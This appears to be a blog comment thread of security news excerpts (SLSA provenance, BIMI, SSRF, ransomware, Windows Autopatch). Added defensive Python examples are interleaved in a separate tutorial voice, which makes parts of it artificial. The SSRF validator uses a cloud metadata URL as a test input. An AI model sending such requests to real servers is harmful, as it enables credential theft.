This proved to be beneficial for me on the X470D4U for two reasons:
The latest bios available contains the AMD AGESA of 1.2.0.0 which has the stuttering issue when the fTPM is utilized on machines running Windows 11
The GPU is inserted in the last slot of the board. The TPM2-S module is a vertical module and this would prevent my GPU from being seated into the board itself
Tomi Engdahl says:
Considering recent events, now is a very good time to bring your organization’s risk assessment up to date. The public sector and, among others, municipally owned companies maintain a significant share of important infrastructure. It is certainly worth assessing the related digital and physical security now with the tools you already have, or acquiring a solution that makes it easier… read more:
https://softwave.fi/ajankohtaista/the-hetki-laittaa-riskienhallinta-kuntoon/
Tomi Engdahl says:
Improving software supply chain security with tamper-proof builds https://security.googleblog.com/2022/04/improving-software-supply-chain.html
This blog post describes a new method of generating non-forgeable provenance using GitHub Actions workflows for isolation and Sigstore’s signing tools for authenticity. Using this approach, projects building on GitHub runners can achieve SLSA 3 (the third of four progressive SLSA “levels”), which affirms to consumers that your artifacts are authentic and trustworthy.
Tomi Engdahl says:
Adversarial Threat Report April 2022
https://about.fb.com/wp-content/uploads/2022/04/Meta-Quarterly-Adversarial-Threat-Report_Q1-2022.pdf
Our findings also include an update on our enforcements in Ukraine, including attempts by previously disrupted state and non-state actors to come back on the platform, in addition to spam networks using deceptive tactics to monetize public attention to the ongoing war.
[+other findings]
Tomi Engdahl says:
What is BIMI and how is it supposed to help with Phishing
https://isc.sans.edu/diary/rss/28528
The latest attempt to find a better way to authenticate an email sender visually is “BIMI,” short for “Brand Indicators for Message Identification” [1]. It will add a company logo to each email, and the logo may be verified. Of course, to make this work, we need yet another DNS TXT record: [selector]._bimi.[domain]. The [selector] can decide which logo will be used. But typically, you should see default._bimi.example.com.
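To make the record mechanics concrete, here is an added example (not code from the ISC diary) that builds the `[selector]._bimi.[domain]` lookup name and parses and sanity-checks a BIMI TXT record. The tag names follow the BIMI specification (`v`, `l`, `a`); the specific checks applied (https only, SVG logo) are this example’s own choices, and the sample records and `example.com` are constructed.

```python
"""Build a BIMI DNS lookup name and parse/validate a BIMI TXT record.

Added example, not from the SANS ISC diary. The sample records below are
constructed; "example.com" is an assumption. Only the record syntax is
checked here; the logo and the evidence document are not fetched.
"""
from urllib.parse import urlparse


def bimi_lookup_name(domain: str, selector: str = "default") -> str:
    """Return the DNS name queried for a BIMI record: <selector>._bimi.<domain>."""
    return f"{selector}._bimi.{domain}"


def parse_bimi_record(txt: str) -> dict:
    """Parse 'tag=value; tag=value' into a dict. Tag names are case-insensitive."""
    tags = {}
    for part in txt.split(";"):
        part = part.strip()
        if not part:
            continue
        if "=" not in part:
            raise ValueError(f"malformed tag: {part!r}")
        key, value = part.split("=", 1)
        tags[key.strip().lower()] = value.strip()
    return tags


def validate_bimi_record(txt: str) -> list:
    """Return a list of problems; an empty list means the record passes these checks.

    Checks: the version tag must come first and equal BIMI1; the logo
    location 'l' must be an https URL pointing to an SVG (an empty value
    declines to publish a logo); the optional evidence document 'a' must
    also be served over https.
    """
    problems = []
    try:
        tags = parse_bimi_record(txt)
    except ValueError as e:
        return [str(e)]
    first = txt.split(";", 1)[0].strip().lower()
    if first != "v=bimi1":
        problems.append("record must start with v=BIMI1")
    if "l" not in tags:
        problems.append("missing required l= (logo URL) tag")
    else:
        logo = tags["l"]
        if logo:
            u = urlparse(logo)
            if u.scheme != "https":
                problems.append("logo URL must use https")
            if not u.path.lower().endswith(".svg"):
                problems.append("logo must be an SVG file")
    evidence = tags.get("a", "")
    if evidence and urlparse(evidence).scheme != "https":
        problems.append("evidence document URL must use https")
    return problems


# Constructed sample records (not real DNS data).
GOOD_RECORD = "v=BIMI1; l=https://example.com/brand/logo.svg; a=https://example.com/brand/vmc.pem"
BAD_RECORD = "v=BIMI1; l=http://example.com/logo.png"


if __name__ == "__main__":
    print(bimi_lookup_name("example.com"))
    print(validate_bimi_record(GOOD_RECORD) or "ok")
    print(validate_bimi_record(BAD_RECORD))
```

A mail-side verifier would run these checks after looking up the TXT record and, on a pass, fetch the logo and evidence document; a record that fails them should be treated as if no BIMI record were published.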
Tomi Engdahl says:
Companies are more prepared to pay ransoms than ever before https://www.tripwire.com/state-of-security/featured/companies-are-more-prepared-to-pay-ransoms-than-ever-before/
The ninth annual Cyberthreat Defense Report (CDR), produced by CyberEdge Group, shows that not only has there been a substantial increase in the percentage of companies that pay ransoms, but the average size of ransomware payments also increased significantly.
Tomi Engdahl says:
The Original APT: Advanced Persistent Teenagers https://krebsonsecurity.com/2022/04/the-original-apt-advanced-persistent-teenagers/
Many organizations are already struggling to combat cybersecurity threats from ransomware purveyors and state-sponsored hacking groups, both of which tend to take days or weeks to pivot from an opportunistic malware infection to a full blown data breach. But few organizations have a playbook for responding to the kinds of virtual “smash and grab” attacks we’ve seen recently from LAPSUS$, a juvenile data extortion group whose short-lived, low-tech and remarkably effective tactics have put some of the world’s biggest corporations on edge.
Tomi Engdahl says:
API Threat Research: Server-side Request Forgery on FinTech Platform Enabled Administrative Account Takeover https://salt.security/blog/api-threat-research-server-side-request-forgery-on-fintech-platform-enabled-administrative-account-takeover
[W]e investigated the platforms of a large US-based FinTech company.
This company offers a “digital transformation” service for banks of all sizes, allowing them to switch many of their traditional banking services to online services. [...] As a result of API vulnerabilities that our researchers identified, they were able to launch attacks
where: Attackers could gain administrative access to the banking system using this platform [...]. How can other companies prevent such a potential disaster? User controlled input is the big culprit. Such parameters should never be blindly trusted. Software and API developers should always make sure to apply as many protections as possible to any user input, especially if the input values are susceptible to attacks such as URL values that may lead to SSRF or other vulnerability classes.
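The advice above (never trust a user-controlled URL before fetching it server-side) in working form, as an added example that is not code from the Salt Security write-up: the unsafe pattern beside a hardened validator that enforces a scheme and host allowlist and then checks that every address the host resolves to is publicly routable, so an allowlisted name cannot quietly point at an internal service. The allowlist entries and the offline resolver table are constructed for the example.

```python
"""Validating a user-supplied URL before a server-side fetch (SSRF defence).

Added example, not code from the Salt Security write-up. The allowlist
hosts and the fake resolver table are constructed for the example.
"""
import ipaddress
import socket
from urllib.parse import urlparse

# Constructed: hosts the service is expected to call on the user's behalf.
ALLOWED_HOSTS = {"partner-api.example.com", "cdn.example.com"}
ALLOWED_SCHEMES = {"https"}


def fetch_unsafe(url: str, http_get) -> bytes:
    """The pattern the article warns about: a URL taken from the request is
    fetched as-is, so it can point at internal services or cloud metadata."""
    return http_get(url)


def resolve_all(hostname: str) -> list:
    """Default resolver: real DNS via socket.getaddrinfo."""
    infos = socket.getaddrinfo(hostname, None)
    return sorted({ipaddress.ip_address(i[4][0]) for i in infos})


def validate_outbound_url(url: str, resolver=resolve_all) -> str:
    """Return the URL if it is safe to fetch, else raise ValueError.

    Checks, in order: scheme allowlist, no embedded credentials, host on the
    allowlist, and every address the host resolves to is globally routable
    (rejects loopback, RFC1918, link-local including 169.254.169.254, etc.).
    """
    u = urlparse(url)
    if u.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {u.scheme!r}")
    if u.username or u.password:
        raise ValueError("credentials in URL are not allowed")
    host = (u.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"host not on allowlist: {host!r}")
    addrs = resolver(host)
    if not addrs:
        raise ValueError("host did not resolve")
    for ip in addrs:
        if not ip.is_global:
            raise ValueError(f"{host} resolves to non-public address {ip}")
    return url


def fetch_safe(url: str, http_get, resolver=resolve_all) -> bytes:
    """Hardened form: validate first; the http_get passed in should also have
    redirects disabled, since a redirect re-introduces an unchecked URL."""
    return http_get(validate_outbound_url(url, resolver))


# Constructed resolver table so the example runs offline. "cdn" models an
# allowlisted name whose record has been pointed at an internal address.
FAKE_DNS = {
    "partner-api.example.com": [ipaddress.ip_address("1.2.3.4")],  # constructed public IP
    "cdn.example.com": [ipaddress.ip_address("10.0.0.5")],
}


def fake_resolver(hostname: str) -> list:
    return FAKE_DNS.get(hostname, [])


def check(url: str) -> str:
    """Return 'ok' or the reason the URL was rejected (helper for demos/tests)."""
    try:
        validate_outbound_url(url, fake_resolver)
        return "ok"
    except ValueError as e:
        return str(e)


if __name__ == "__main__":
    for u in ("https://partner-api.example.com/v1/report",
              "https://169.254.169.254/latest/meta-data/",
              "https://cdn.example.com/asset.js"):
        print(u, "->", check(u))
```

Resolving the name at validation time still leaves a window for a DNS answer to change between the check and the connect; the robust version pins the validated address when opening the socket, which is beyond this short example.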
Tomi Engdahl says:
Voice of the Modern Developer: Insights From 400+ Developers https://www.tromzo.com/blog/voice-of-the-modern-developer
Instead of propagating the blame game between Dev and AppSec teams, we believe it is more productive to better understand the challenges developers face, how they feel about security, and what organizations can do to bake security into the development process. To that end, we commissioned a survey of over 400 AppSec professionals for our first annual State of Modern Application Security Report. [Key findings:] 42% of developers push vulnerable code once per month, Developers fix only 32% of vulnerabilities, A third of vulnerabilities are noise, 33% believe that developers and security are siloed.
Tomi Engdahl says:
Healthcare and the Other CIA
https://www.securityweek.com/healthcare-and-other-cia
For IT professionals, the acronym “CIA” refers to the Confidentiality, Integrity and Availability of information, not the Central Intelligence Agency. However, given the current threat level to data security, IT teams may wish they could get a little help from people with intelligence community tradecraft experience.
Healthcare has become a prime target for what amounts to data espionage. According to the U.S. Department of Health and Human Services, there were 618 breaches and attacks serious enough to affect at least 500 people in 2021, and there’s no reason to think 2022 will be any better.
Two specific types of exploits are being seen with disturbing frequency. The first is out-and-out theft of patient records for financial gain. A typical example is the breach of a third-party system from Dental Care Alliance. This exploit impacted more than 1 million patients, 10% of whom had their bank account numbers stolen.
The second type of exploit is ransomware, which is even more devastating, because inability to access patient data can put their lives at risk. There are plenty of statistics available about the increasing number of ransomware attacks on hospitals and healthcare systems in general, but the most frightening development is the rise of Ransomware-as-a-Service (RaaS). Anyone reading this article could log on to the dark web and easily obtain ransomware capabilities.
More sophisticated RaaS systems are priced in the thousands of dollars, but many of them come with commercial-style features like 24/7 technical support. And the rewards of a successful attack can be huge. In 2021, IBM reported the average cost of a cyberattack to a healthcare system to be $4.62 million per incident, much of which went into attackers’ pockets.
Tomi Engdahl says:
https://www.securityweek.com/healthcare-and-other-cia
Fortunately, effective defenses do exist. Many of them work quite well, but they all come with pluses and minuses. Here’s a summary:
● Training: When employees are trained to avoid risky behavior, such as clicking on links in an email from an unknown source, the threat of attack is reduced. However, human error is a fact of life, and no amount of training can ensure employees will never make a mistake.
● Upgrades: Software updates often include important security improvements along with other features. However, upgrades can be complicated to install, require testing, and are notorious for crashing systems. Recently, the installation of a recommended update from an international software vendor resulted in a major incident that took down 20 National Health Service IT systems in the UK.
● Cybersecurity software: A wide (and sometimes confusing) variety of applications are available to detect and mitigate cyber attacks, and in general they work. Unfortunately, they are often beyond the budget of healthcare organizations. They sometimes have steep learning curves and are typically incompatible with one another. Also, because the cybercrime community is constantly evolving new forms of attack, these applications can quickly become outdated.
● Best Practices: Adopting best practices such as end-to-end encryption, role-based access and least-privileged access controls, mandatory password updates and the like all contribute to data security. However, all of these require a significant commitment of resources for administration, and can introduce significant friction into the system.
Tomi Engdahl says:
Zoom Paid Out $1.8 Million in Bug Bounties in 2021
https://www.securityweek.com/zoom-paid-out-18-million-bug-bounties-2021
Video communications giant Zoom this week announced that it paid out roughly $1.8 million in bug bounty rewards in 2021.
The company launched its bug bounty program on the HackerOne platform in 2019, and says it has handed out more than $2.4 million in bounty payouts to date.
Although only 401 vulnerability reports were rewarded last year, the bug bounty program has attracted more than 800 hackers, the company says.
“This past year, our Vulnerability Management and Bug Bounty (VMBB) team focused on navigating a competitive recruitment landscape and attracting more ‘rock star’ security researchers to join our program by providing them with an excellent experience,” Zoom says.
Tomi Engdahl says:
BlackCat Ransomware Targets Industrial Companies
https://www.securityweek.com/blackcat-ransomware-targets-industrial-companies
A data theft tool used by the ransomware group tracked as BlackCat, ALPHV and Noberus, suggests that the cybercriminals are increasingly interested in targeting industrial organizations.
The BlackCat ransomware group, which operates under a ransomware-as-a-service (RaaS) model, emerged in November 2021 and has since targeted organizations worldwide, including many in the United States.
Several cybersecurity firms have found links between BlackCat and the BlackMatter and DarkSide ransomware operations. It appears that the BlackCat team consists of various RaaS group affiliates, including BlackMatter, rather than being a rebranding of BlackMatter.
In a blog post published on Thursday, Kaspersky also provided information on the connection between BlackMatter and BlackCat, focusing on a data exfiltration tool called Fendr and ExMatter.
Fendr was described by Symantec last year as a custom data exfiltration tool that enabled BlackMatter operators to easily steal data of value from compromised systems. The tool, previously seen only in BlackMatter attacks, is designed to collect specific file types and upload them to the cybercriminals’ servers before file-encrypting ransomware is deployed. The stolen data can then be used to pressure the victim into paying up.
In a report published in February, industrial cybersecurity firm Claroty said ransomware often hits industrial control systems (ICS) or other operational technology (OT) environments, and impact is often significant.
Ransomware Often Hits Industrial Systems, With Significant Impact: Survey
https://www.securityweek.com/ransomware-often-hits-industrial-systems-significant-impact-survey
Ransomware attacks in many cases hit industrial control systems (ICS) or operational technology (OT) environments, and impact is often significant, according to a report published on Thursday by IoT and industrial cybersecurity company Claroty.
Claroty’s “Global State of Industrial Cybersecurity” report is based on a Pollfish survey of 1,100 IT and OT security professionals in the United States, Europe and the APAC region. More than half of respondents work for enterprises that have an annual revenue exceeding $1 billion. The survey was conducted in September 2021.
Roughly 80% of respondents admitted that their organization had experienced a ransomware attack within the past year, and nearly half said the incident had impacted their ICS/OT environment.
Only 15% of respondents said there was no impact or minimal impact on operations, and nearly 50% said there was significant impact. Seven percent said the incident resulted in a full operations shutdown that lasted for more than a week.
The cyberattack was disclosed to both authorities and shareholders in most cases, but some companies apparently did not inform anyone.
Tomi Engdahl says:
Google Teams Up With GitHub for Supply Chain Security
https://www.securityweek.com/google-teams-github-supply-chain-security
Google has teamed up with GitHub for a solution that should help prevent software supply chain attacks such as the ones that affected SolarWinds and Codecov.
Google’s open source security team explained that in the SolarWinds attack hackers gained control of a build server and injected malicious artifacts into a build platform. In the Codecov attack, threat actors bypassed trusted builders to upload their artifacts.
“Each of these attacks could have been prevented if there were a way to detect that the delivered artifacts diverged from the expected origin of the software,” Google explained. “But until now, generating verifiable information that described where, when, and how software artifacts were produced (information known as provenance) was difficult. This information allows users to trace artifacts verifiably back to the source and develop risk-based policies around what they consume.”
Google and GitHub now propose a new method for generating what they describe as “non-forgeable provenance.” The method leverages GitHub Actions workflows for isolation and Sigstore signing tools for authenticity.
The goal is to help projects building on GitHub runners achieve a high SLSA level, which reassures consumers that their artifacts are trustworthy and authentic.
SLSA (Supply-chain Levels for Software Artifacts) is a framework designed for improving the integrity of a project by enabling users to trace software from the final version back to its source code. In this case, the goal is to achieve SLSA level 3 out of a total of four levels.
Improving software supply chain security with tamper-proof builds
April 7, 2022
https://security.googleblog.com/2022/04/improving-software-supply-chain.html
Many of the recent high-profile software attacks that have alarmed open-source users globally were consequences of supply chain integrity vulnerabilities: attackers gained control of a build server to use malicious source files, inject malicious artifacts into a compromised build platform, and bypass trusted builders to upload malicious artifacts. Each of these attacks could have been prevented if there were a way to detect that the delivered artifacts diverged from the expected origin of the software. But until now, generating verifiable information that described where, when, and how software artifacts were produced (information known as provenance) was difficult. This information allows users to trace artifacts verifiably back to the source and develop risk-based policies around what they consume. Currently, provenance generation is not widely supported, and solutions that do exist may require migrating build processes to services like Tekton Chains.
This blog post describes a new method of generating non-forgeable provenance using GitHub Actions workflows for isolation and Sigstore’s signing tools for authenticity. Using this approach, projects building on GitHub runners can achieve SLSA 3 (the third of four progressive SLSA “levels”), which affirms to consumers that your artifacts are authentic and trustworthy.
SLSA (“Supply-chain Levels for Software Artifacts”) is a framework to help improve the integrity of your project throughout its development cycle, allowing consumers to trace the final piece of software you release all the way back to the source. Achieving a high SLSA level helps to improve the trust that your artifacts are what you say they are.
https://slsa.dev/
Supply chain Levels for Software Artifacts, or SLSA (salsa).
It’s a security framework, a check-list of standards and controls to prevent tampering, improve integrity, and secure packages and infrastructure in your projects, businesses or enterprises. It’s how you get from safe enough to being as resilient as possible, at any link in the chain.
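What a consumer actually does with provenance, for both the Google blog excerpt above and the earlier post quoting it: an added example, not code from Google, SLSA or Sigstore, that checks a SLSA provenance statement against a downloaded artifact. It assumes the in-toto Statement / SLSA provenance v0.2 JSON layout and verifies only the unsigned content (artifact digest listed as a subject, builder on a trusted list, expected source repository); the signature check that Sigstore provides in the real scheme is represented by a caller-supplied callback. The builder id, repository, artifact bytes and attestation are all constructed.

```python
"""Checking a SLSA provenance attestation against a downloaded artifact.

Added example; not code from the Google blog post, SLSA or Sigstore. It
assumes the in-toto Statement / SLSA provenance v0.2 JSON layout. Signature
verification is out of scope and stubbed by the signature_ok callback.
The policy values, artifact bytes and attestation below are constructed.
"""
import hashlib

# Constructed policy: builder identities and source repository we accept.
TRUSTED_BUILDERS = {"https://builder.example.com/slsa3-workflow@v1"}
EXPECTED_REPO = "git+https://github.com/example-org/example-app@"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_provenance(statement: dict, artifact: bytes, artifact_name: str,
                      signature_ok=lambda stmt: True) -> list:
    """Return a list of policy violations; an empty list means the artifact is accepted.

    signature_ok: verifies the attestation envelope signature (Sigstore in the
    real scheme). If it fails, nothing else in the statement can be trusted.
    """
    if not signature_ok(statement):
        return ["attestation signature invalid"]
    problems = []
    if statement.get("_type") != "https://in-toto.io/Statement/v0.1":
        problems.append("unexpected statement type")
    if statement.get("predicateType") != "https://slsa.dev/provenance/v0.2":
        problems.append("unexpected predicate type")
    # The artifact we hold must be one of the subjects, by name and digest.
    digest = sha256_hex(artifact)
    subjects = statement.get("subject", [])
    match = [s for s in subjects
             if s.get("name") == artifact_name
             and s.get("digest", {}).get("sha256", "").lower() == digest]
    if not match:
        problems.append(f"artifact {artifact_name} digest {digest[:12]}... not in subjects")
    # Provenance is only as good as the builder that produced it.
    pred = statement.get("predicate", {})
    builder = pred.get("builder", {}).get("id")
    if builder not in TRUSTED_BUILDERS:
        problems.append(f"untrusted builder: {builder!r}")
    # The build must have been driven from the source repository we expect.
    repo = pred.get("invocation", {}).get("configSource", {}).get("uri", "")
    if not repo.startswith(EXPECTED_REPO):
        problems.append(f"unexpected source repository: {repo!r}")
    return problems


# Constructed artifact and a matching attestation.
ARTIFACT = b"#!/bin/sh\necho example-app 1.0\n"
STATEMENT = {
    "_type": "https://in-toto.io/Statement/v0.1",
    "predicateType": "https://slsa.dev/provenance/v0.2",
    "subject": [{"name": "example-app-1.0.tar.gz",
                 "digest": {"sha256": sha256_hex(ARTIFACT)}}],
    "predicate": {
        "builder": {"id": "https://builder.example.com/slsa3-workflow@v1"},
        "buildType": "https://builder.example.com/build-types/generic@v1",
        "invocation": {"configSource": {
            "uri": "git+https://github.com/example-org/example-app@refs/tags/v1.0",
            "digest": {"sha1": "0" * 40},
            "entryPoint": ".github/workflows/release.yml"}},
    },
}

if __name__ == "__main__":
    print(verify_provenance(STATEMENT, ARTIFACT, "example-app-1.0.tar.gz") or "accepted")
    print(verify_provenance(STATEMENT, ARTIFACT + b"# extra bytes\n", "example-app-1.0.tar.gz"))
```

The builder check is the one that encodes the SLSA 3 property from the post: a provenance statement that merely lists the right digest proves nothing if it could have been produced by anyone, so the consumer must trust the identity that signed it, not just the content.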
Tomi Engdahl says:
A cybersecurity CEO saw a 3000% increase in his company’s valuation to $1.4 billion in a year. Though even he calls it ‘inflated,’ he says VCs are still hounding him.
https://www.businessinsider.com/cybersecurity-startup-unicorn-status-coatue-investment-2022-4?utm_source=copy-link&utm_medium=referral&utm_content=topbar&r=US&IR=T
Panther Labs’ 31-year-old founder and CEO, Jack Naglieri, found himself in the enviable position of being hounded by prospective investors last year, even as he politely rebuffed them.
“I wasn’t ready yet,” Naglieri said. “We had just raised our Series A less than six months prior. Things were still fairly early, and I wanted to wait for the business to grow a little bit more.”
Tomi Engdahl says:
Windows Autopatch Aims to Make Patch Tuesday ‘Just Another Tuesday’ for Enterprises
https://www.securityweek.com/windows-autopatch-aims-make-patch-tuesday-just-another-tuesday-enterprises
Microsoft this week announced Windows Autopatch, a new automatic updates service for Windows 10 and 11 Enterprise E3 customers that will manage all software, firmware, driver, and enterprise app updates.
The new feature ensures that Windows and Office products on enrolled endpoints are automatically updated, at no additional cost, helping admins more easily manage the security updates rolled out on the second Tuesday of every month.
“The second Tuesday of every month will be ‘just another Tuesday’,” said Microsoft’s Lior Bela.
Windows Autopatch rolls out updates gradually, to evaluate the deployment and ensure that no issues arise. Thus, all registered devices should be kept updated without disrupting business operations.
“The development of Autopatch is a response to the evolving nature of technology. Changes like the pandemic-driven demand for increased remote or hybrid work represent particularly noteworthy moments but are nonetheless part of a cycle without a beginning or end,” Microsoft notes.
Autopatch, Microsoft says, will eliminate security gaps by delivering important updates in a timely manner, providing enterprises with timely response to changes.
According to Microsoft, Windows Autopatch can detect variations among endpoints to dynamically create 4 testing “rings,” which are groups of devices representative of the diversity within the enterprise environment.
These rings include the ‘test’ ring, containing a minimum number of representative devices, the ‘first’ ring, which contains roughly 1% of the managed devices, the ‘fast’ ring, containing roughly 9% of devices, and the ‘broad’ ring, which contains the remaining 90% of endpoints.
“The population of these rings is managed automatically, so as devices come and go, the rings maintain their representative samples. Since every organization is unique, though, the ability to move specific devices from one ring to another is retained by enterprise IT admins,” Microsoft notes.
Get current and stay current with Windows Autopatch
https://techcommunity.microsoft.com/t5/windows-it-pro-blog/get-current-and-stay-current-with-windows-autopatch/ba-p/3271839
As IT departments are being asked to do more with less, Microsoft is pleased to introduce[1] Windows Autopatch as a feature of Windows Enterprise E3[2], enabling IT pros to do more for less. This service will keep Windows and Office software on enrolled endpoints up-to-date automatically, at no additional cost. IT admins can gain time and resources to drive value. The second Tuesday of every month will be ‘just another Tuesday’.
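The ring scheme described above (a small test ring, then roughly 1%, 9% and 90% of devices, with membership maintained as devices come and go and admin overrides allowed) as an added example; this is not Microsoft’s code or any Autopatch API. The ring sizes come from the article; assigning devices by a stable hash of their id, the minimum test-ring size and the override map are this example’s own design choices, and the device inventory is constructed.

```python
"""Assigning managed devices to staged update rings: a small test ring,
then roughly 1% / 9% / 90% of the remaining devices.

Added example, not Microsoft's code or API. Ring shares come from the
article; stable-hash assignment, MIN_TEST_RING and the override map are
this example's own design, and the device inventory is constructed.
"""
import hashlib

RING_ORDER = ["test", "first", "fast", "broad"]
# Share of devices after the test ring is carved out (from the article).
SHARES = {"first": 0.01, "fast": 0.09, "broad": 0.90}
MIN_TEST_RING = 3  # assumption: smallest test ring accepted as representative


def _bucket(device_id: str) -> float:
    """Map a device id to a stable point in [0, 1). Because it depends only
    on the id, a device keeps its ring as other devices join or leave."""
    h = hashlib.sha256(device_id.encode()).digest()
    return int.from_bytes(h[:8], "big") / 2**64


def assign_rings(device_ids, test_ring_size=None, overrides=None) -> dict:
    """Return {device_id: ring}.

    test_ring_size: explicit size of the test ring, or None for ~0.5% of
    devices (never fewer than MIN_TEST_RING).
    overrides: {device_id: ring} set by an admin; these win over the hash.
    """
    overrides = overrides or {}
    ids = sorted(set(device_ids))
    if test_ring_size is None:
        test_ring_size = max(MIN_TEST_RING, round(len(ids) * 0.005))
    # Test ring = the highest hash buckets, so its membership is stable too
    # and it is carved out of the large 'broad' range, not the small ones.
    ranked = sorted(ids, key=_bucket)
    test_members = ranked[-test_ring_size:] if test_ring_size else []
    rings = {d: "test" for d in test_members}
    for d in ranked[:len(ranked) - len(test_members)]:
        b = _bucket(d)
        if b < SHARES["first"]:
            rings[d] = "first"
        elif b < SHARES["first"] + SHARES["fast"]:
            rings[d] = "fast"
        else:
            rings[d] = "broad"
    for d, ring in overrides.items():
        if ring not in RING_ORDER:
            raise ValueError(f"unknown ring {ring!r}")
        if d in rings:
            rings[d] = ring
    return rings


def ring_counts(rings: dict) -> dict:
    """Count devices per ring, in deployment order."""
    return {r: sum(1 for v in rings.values() if v == r) for r in RING_ORDER}


def rollout_plan(rings: dict):
    """Yield (ring, sorted device ids) in the order an update is released."""
    for r in RING_ORDER:
        yield r, sorted(d for d, v in rings.items() if v == r)


# Constructed inventory of 2,000 device ids.
DEVICES = [f"PC-{i:05d}" for i in range(2000)]

if __name__ == "__main__":
    rings = assign_rings(DEVICES, overrides={"PC-00000": "test"})
    print(ring_counts(rings))
    for ring, members in rollout_plan(rings):
        print(ring, len(members), members[:3])
```

Hashing the device id rather than drawing a random sample is what gives the "rings maintain their representative samples" property: adding or retiring devices changes only those devices' entries, not everyone else's ring, which is what makes a ring-by-ring rollout and its pause criteria meaningful over time.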
Tomi Engdahl says:
https://portswigger.net/daily-swig/hacker-community-jumps-on-hilarious-twitter-meme-mocking-bad-infosec-advice-from-cisos
Tomi Engdahl says:
Feds Allege Destructive Russian Hackers Targeted US Refineries
The Justice Department unsealed indictments against four alleged Russian hackers said to have targeted US energy infrastructure for nearly a decade.
https://www.wired.com/story/triton-berserk-bear-russian-hackers-doj-indictment/
Tomi Engdahl says:
Why VPNs are a WASTE of Your Money (usually…)
https://www.youtube.com/watch?v=9_b8Z2kAFyY
Commercial VPNs probably hurt your privacy and security more than they help. Behind the layers of marketing sits a darker side of the industry. Ask yourself questions like:
- Why trust a VPN company and their ISP over my own?
- Who’s actually running these companies?
- Why so many VPN ads on YouTube?
- What’s up with all the review sites?